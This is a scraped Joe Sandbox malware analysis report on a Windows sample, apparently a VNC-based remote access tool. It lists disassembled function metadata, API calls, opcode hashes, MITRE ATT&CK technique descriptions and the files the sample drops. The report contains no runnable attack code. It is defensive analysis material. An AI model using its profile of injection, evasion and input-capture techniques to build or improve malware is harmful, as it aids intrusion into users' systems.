Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: I
API String ID: 2959964966-3707901625
Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
Instruction ID: 750e9957390098f1abc241082e38842df8bfb349ce2c97c94bfc0a8884bc4ae2
Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
Instruction Fuzzy Hash: 72115E72A0C744C5EB24AB52A540379B7A5FB94BE0F584235EE9C07BA9CF3CE545CB00

Function 00007FF74000D9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

OpenFileMappingA.KERNEL32 ref: 00007FF74000DA07
MapViewOfFile.KERNEL32 ref: 00007FF74000DA2D

Strings

{34F673E0-878F-11D5-B98A-00B0D07B8C7C}, xrefs: 00007FF74000D9FB

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$MappingOpenView
String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
API String ID: 3439327939-3305976270
Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
Instruction ID: c05865ca8af7d15f156d9aa7949b5c08790143b339323b28d31ddbbb42000093
Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
Instruction Fuzzy Hash: 1701523250DB94C5E720DB65F441659F390FB85764F854235D6A906B98CF7CE450C760

Function 00007FF74000DA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

OpenFileMappingA.KERNEL32 ref: 00007FF74000DAA7
MapViewOfFile.KERNEL32 ref: 00007FF74000DACD

Strings

{34F673E0-878F-11D5-B98A-57B0D07B8C7C}, xrefs: 00007FF74000DA9B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$MappingOpenView
String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
API String ID: 3439327939-2897898322
Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
Instruction ID: 8095f71491b8c3d3f5226655a5f7c8c50bea959409c4ce13e420bff4aa42f9ba
Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
Instruction Fuzzy Hash: 3D01527250DB91C6E720DBA5F44165AB3A0FB88764F854335DAA907B98CF7CE051C720

Function 00007FF74000A200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF74000A225
FreeLibrary.KERNEL32 ref: 00007FF74000A265

Strings

DllGetVersion, xrefs: 00007FF74000A219

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryProc
String ID: DllGetVersion
API String ID: 3013587201-2861820592
Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
Instruction ID: 3ffd4f9e9431f9c39817752d1f4a5bc58bfa0b23879f8b06250f521b237c8489
Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
Instruction Fuzzy Hash: 0C01213161C741C2E714AF55B48017AB6A0FB88794F845139FA9E42B68DF3CE554CB20

Function 00007FF74001E4B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 00007FF74001E4E5
DeleteCriticalSection.KERNEL32 ref: 00007FF74001E503

Strings

vncclient.cpp : update thread gone, xrefs: 00007FF74001E511

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection
String ID: vncclient.cpp : update thread gone
API String ID: 166494926-1446885542
Opcode ID: 9e3f7b4cbe2ea9e43e15b535a150d417f1769ce92df595d026cef6ea7500f3eb
Instruction ID: 8f7376c3585d5ef0f6a8b175b85dc2becacbd10428f4cfc77312be31e20e0743
Opcode Fuzzy Hash: 9e3f7b4cbe2ea9e43e15b535a150d417f1769ce92df595d026cef6ea7500f3eb
Instruction Fuzzy Hash: D2016925A0CB82D1D610BB10E5403B8A321FB44BA4F944231CA6D07BB9DF3DF1558320

Function 00007FF7400289E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationwindowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00007FF740028A29
WaitForSingleObject.KERNEL32 ref: 00007FF740028A36

Strings

vncclient.cpp : client Kill() called, xrefs: 00007FF7400289ED

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: MessageObjectSendSingleWait
String ID: vncclient.cpp : client Kill() called
API String ID: 353115698-1198714380
Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
Instruction ID: ced20c2c4a4051d1a2f37adf65e293d6ac52df0ffdb942cba36e556ef40de540
Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
Instruction Fuzzy Hash: 55017132A09981C1FB58BF25E4557A9A361EF88B74F844235CA3C067E9CF38E894C390

Function 00007FF740097320 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF740097338
EnterCriticalSection.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF740097352
InitializeCriticalSection.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF74009739C
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF7400973E3

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeaveValue
String ID:
API String ID: 3200804837-0
Opcode ID: 3599b78de9cfbe8e82d1d2c83279c504dd7d71690102d9af0d22e184b3dd9c74
Instruction ID: 2536f5d9dc01b5b712e38719f3cc849b044e114fc31f6108ca678e07e1cb6b5f
Opcode Fuzzy Hash: 3599b78de9cfbe8e82d1d2c83279c504dd7d71690102d9af0d22e184b3dd9c74
Instruction Fuzzy Hash: 5321F832A1DB42D1EA05BF11E990668B3A4FF49B94B848035DA8D037A8DF3CF5658721

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mSRW5AfJpC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\8e6e7dde-55aa-49f1-a672-32ad6e844e75.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5478e0.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\df43cf0e-0d59-4506-89e0-f7ed7c156fb3.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223123732Z-203.bmp

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Windows Analysis Report
mSRW5AfJpC.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

